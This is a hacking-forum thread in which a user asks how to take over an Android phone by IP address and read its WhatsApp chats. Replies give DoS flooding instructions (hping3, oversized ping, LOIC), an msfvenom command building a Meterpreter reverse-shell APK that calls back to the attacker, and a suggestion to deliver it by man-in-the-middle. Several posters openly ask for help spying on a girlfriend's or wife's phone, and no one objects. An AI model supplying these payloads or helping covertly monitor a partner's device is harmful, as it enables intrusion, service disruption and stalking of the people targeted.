Forum Thread: How to Hack an Android Device with Only a Ip Adress

i have a android phone and im wondering if i could get remote access to it with just the ip of the device and being able to look to whatsapp etc . i would like to preform actions like in a metasploit session but just without an file that needs to be installed on the device

8 Responses

Well, a DoS attack is the simplest and one of my favorite attacks. Use something like hping3 to ping the device until it crashes! If you are using Windows, prepare a DDoS attack by getting a large group of people to ping ip address -t -l 65500 or just use LOIC.

but how do i continue to get control of the device and get like whatsapp chats or call history etc

Can you help me install keylogger in my girlfriend's phone remotely?? Please reply

how do i continue to get control of the device and get like whatsapp chats or call history etc

If you want to carry out this task, you will need to create a payload using msfvenom (metasploit) - you can use this command to create the payload - msfvenom -p android/meterpreter/reverse_tcp LHOST=(put your ip in here) LPORT=4444 R > App.apk

this method does only work with devices on your network unless you allow port forwarding on your router.
if you need assistance with msf and how to take full control email me at - anonymous-helpdesk(AT)outlook(DOT)com

i nee dyour advice and how i control android mobile with ip adress are same wife how can i hack

You should take HelpDesks advice and create and install a payload. the ip alone wont do much for ya, a payload is pretty nessesary.

If you dont have access to the device and no other way of sending the payload to the target. Knowing the ip address, i suppose you could perform a MITM attack to get your payload to the target. But that doesnt mean theyll install it.

knowing the ip address is good for a lot of things, tho controlling a device remotely isnt really one of them.

If your just wanting to have remote access to one of your devices or one that you have access to and dont want to install a payload. Use SSH or something like VNC, TeamViewer ect. With these you just put them on both devices and connect using the ip and usually a password or keys.

Share Your Thoughts

• Hot
  • Active